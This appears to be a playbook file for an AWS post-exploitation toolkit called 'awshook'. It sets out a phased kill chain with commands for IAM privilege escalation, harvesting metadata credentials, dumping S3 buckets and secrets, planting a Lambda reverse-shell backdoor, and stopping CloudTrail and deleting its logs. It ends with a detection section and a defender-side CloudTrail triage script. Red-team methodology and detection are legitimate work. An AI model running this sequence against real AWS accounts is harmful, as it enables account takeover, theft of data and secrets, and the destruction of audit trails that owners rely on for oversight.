| name | aws-postexploit |
| description | AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3 |
| category | post-exploitation |
| tags | ["aws","cloud","post-exploitation","iam","s3","lambda","ssm","cloudtrail","credential-access","defense-evasion","persistence"] |
| tech_stack | ["aws","boto3","python"] |
| cwe_ids | ["CWE-269","CWE-522","CWE-693","CWE-284"] |
| chains_with | ["T1078.004","T1530","T1537","T1562.008","T1098","T1059.009","T1552.005"] |
| prerequisites | ["T1078.004","T1552.005"] |
| version | 1.0 |
AWS Post-Exploitation Methodology
AWS post-exploitation uses boto3, the AWS CLI, and direct metadata endpoint access to perform privilege escalation, data exfiltration, and persistence after compromising IAM credentials or gaining EC2 instance access. These tools target IAM misconfigurations, S3 data stores, Secrets Manager, Lambda functions, and SSM for lateral movement.
Prerequisites
Before deploying awshook tools, verify:
- Valid AWS credentials — access key + secret key, session token, or instance profile
- boto3 installed — `pip3 install boto3`
- Current identity — `aws sts get-caller-identity` to confirm access
- Region — set via `--region`, `AWS_DEFAULT_REGION`, or profile config

```bash
aws sts get-caller-identity
aws iam get-user 2>/dev/null || echo "No IAM user (likely role/instance profile)"
python3 -c "import boto3; print('boto3 OK')"
```
Kill Chain Phases
Phase 1 — Situational Awareness (First 60 seconds)
Understand the AWS environment and current permissions.
| Action | Command | Purpose |
|---|---|---|
| IAM enumeration | awshook iam_enum | Map all users, roles, policies; identify privilege escalation paths |
| Metadata harvest | awshook metadata_harvest | Extract IAM role credentials from EC2/ECS/Lambda metadata |
| CloudTrail status | awshook cloudtrail_blind --action status | Check logging configuration before any noisy operations |
Phase 2 — Privilege Escalation
Exploit IAM misconfigurations to gain higher privileges.
| Action | Command | Purpose |
|---|---|---|
| PassRole escalation | awshook iam_privesc --method passrole | Create Lambda with admin role via iam:PassRole |
| AssumeRole chain | awshook iam_privesc --method assumerole --role-arn ARN | Assume role with broader permissions |
| Policy attachment | awshook iam_privesc --method attach_policy | Attach AdministratorAccess to current user |
| Access key creation | awshook iam_privesc --method create_key --target-user USER | Create new access key for persistence |
Phase 3 — Data Exfiltration
Extract sensitive data from AWS services.
| Action | Command | Purpose |
|---|---|---|
| S3 dump | awshook s3_dump | Find and download sensitive files from all buckets |
| Secrets extraction | awshook secrets_dump | Extract Secrets Manager and SSM Parameter Store values |
| EBS snapshot | awshook ec2_snapshot --volume-id VOL_ID | Snapshot volumes for offline data access |
Phase 4 — Persistence
Establish persistent access to the AWS environment.
| Action | Command | Purpose |
|---|---|---|
| Lambda backdoor | awshook lambda_backdoor --function-name NAME --callback-url URL | Inject reverse shell into Lambda |
| SSM execution | awshook ssm_exec --instance-id ID --command CMD | Execute commands on EC2 via SSM |
Phase 5 — Operational Security
Reduce detection footprint.
| Action | Command | Purpose |
|---|---|---|
| Stop CloudTrail | awshook cloudtrail_blind --action stop | Stop CloudTrail logging |
| Delete logs | awshook cloudtrail_blind --action delete_logs | Remove existing CloudTrail logs from S3 |
Phase 6 — Cleanup (MANDATORY)
```bash
awshook cleanup_aws
```
The cleanup tool:
- Restores CloudTrail logging (start_logging on stopped trails)
- Deletes Lambda functions and layers created by lambda_backdoor
- Removes IAM roles, policies, and access keys created by iam_privesc
- Deletes EBS snapshots created by ec2_snapshot
- Cleans the state file (~/.cyberstrike/awshook-state.json)
Detection Considerations
AWS post-exploitation tools are detectable by:
- CloudTrail — All API calls logged (unless blinded). Key events: CreateAccessKey, AttachUserPolicy, CreateFunction, StopLogging
- GuardDuty — Anomalous IAM behavior, unusual API calls, credential exfiltration patterns
- AWS Config — Configuration change detection for IAM, Lambda, CloudTrail
- IAM Access Analyzer — External access to resources, unused permissions
- Security Hub — Aggregated findings from GuardDuty, Config, Access Analyzer
- S3 Access Logging — Object-level access logging for data exfiltration detection
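As an added defender-side example (not part of the awshook toolkit), a small triage routine over CloudTrail records that flags the key events listed above, escalates `AttachUserPolicy` when the policy is AdministratorAccess, and raises a burst alert when one principal issues several watchlisted calls inside a short window. The records, account id, ARNs and trail name are constructed for the example.

```python
from datetime import datetime, timedelta

# Key events from the Detection Considerations list, with a severity and why each matters.
WATCHLIST = {
    "CreateAccessKey": ("high", "new long-lived credential (persistence)"),
    "AttachUserPolicy": ("high", "managed policy attached to a user (privilege escalation)"),
    "CreateFunction": ("medium", "new Lambda; verify the execution role passed to it"),
    "StopLogging": ("critical", "CloudTrail trail stopped (defense evasion)"),
}

# Constructed records in CloudTrail's JSON shape (not from any real account); fields trimmed.
DEV = "arn:aws:iam::111122223333:user/dev"
SAMPLE_EVENTS = [
    {"eventTime": "2024-03-01T10:00:41Z", "eventName": "AttachUserPolicy", "sourceIPAddress": "203.0.113.7",
     "userIdentity": {"arn": DEV},
     "requestParameters": {"userName": "dev", "policyArn": "arn:aws:iam::aws:policy/AdministratorAccess"}},
    {"eventTime": "2024-03-01T10:01:12Z", "eventName": "CreateAccessKey", "sourceIPAddress": "203.0.113.7",
     "userIdentity": {"arn": DEV}, "requestParameters": {"userName": "dev"}},
    {"eventTime": "2024-03-01T10:02:30Z", "eventName": "StopLogging", "sourceIPAddress": "203.0.113.7",
     "userIdentity": {"arn": DEV}, "requestParameters": {"name": "org-trail"}},
    {"eventTime": "2024-03-01T14:15:00Z", "eventName": "CreateFunction", "sourceIPAddress": "198.51.100.9",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:role/ci-deploy"},
     "requestParameters": {"functionName": "nightly-report"}},
]

def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")

def triage(events, window=timedelta(minutes=10), burst=3):
    """Return (findings, burst_principals) for a list of CloudTrail records."""
    findings = []
    for ev in events:
        name = ev.get("eventName")
        if name not in WATCHLIST:
            continue
        severity, reason = WATCHLIST[name]
        params = ev.get("requestParameters") or {}
        # AdministratorAccess attached to a user is the Phase 2 "attach_policy" pattern described above.
        if name == "AttachUserPolicy" and str(params.get("policyArn", "")).endswith("/AdministratorAccess"):
            severity, reason = "critical", "AdministratorAccess attached to a user"
        findings.append({"time": ev["eventTime"], "principal": ev["userIdentity"]["arn"], "event": name,
                         "severity": severity, "reason": reason, "source_ip": ev.get("sourceIPAddress")})
    # Several watchlisted calls from one principal in a short window match the escalate-then-blind sequence above.
    bursts = set()
    for principal in {f["principal"] for f in findings}:
        times = sorted(_ts(f["time"]) for f in findings if f["principal"] == principal)
        if any(times[i + burst - 1] - times[i] <= window for i in range(len(times) - burst + 1)):
            bursts.add(principal)
    return findings, sorted(bursts)
```

Management events such as these are recorded by default, and the StopLogging call itself is written to the trail before logging halts; S3 object reads of the kind s3_dump performs appear only when data events are enabled on the trail.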
Program Reference
| Program | Technique | MITRE ATT&CK |
|---|---|---|
| iam_enum | IAM user/role/policy enumeration and privesc analysis | T1087.004 — Cloud Account |
| iam_privesc | IAM privilege escalation via PassRole/AssumeRole/Policy | T1098 — Account Manipulation |
| s3_dump | S3 bucket data exfiltration | T1530 — Data from Cloud Storage |
| lambda_backdoor | Lambda function backdoor for persistence | T1525 — Implant Internal Image |
| ssm_exec | Remote command execution via SSM | T1021.007 — Cloud Services |
| metadata_harvest | EC2/ECS/Lambda metadata credential extraction | T1552.005 — Cloud Instance Metadata API |
| cloudtrail_blind | CloudTrail log evasion | T1562.008 — Disable Cloud Logs |
| secrets_dump | Secrets Manager/Parameter Store extraction | T1555.006 — Cloud Secrets Management Stores |
| ec2_snapshot | EBS volume snapshot for data access | T1537 — Transfer Data to Cloud Account |
| cleanup_aws | Resource removal and trail restoration | T1070 — Indicator Removal |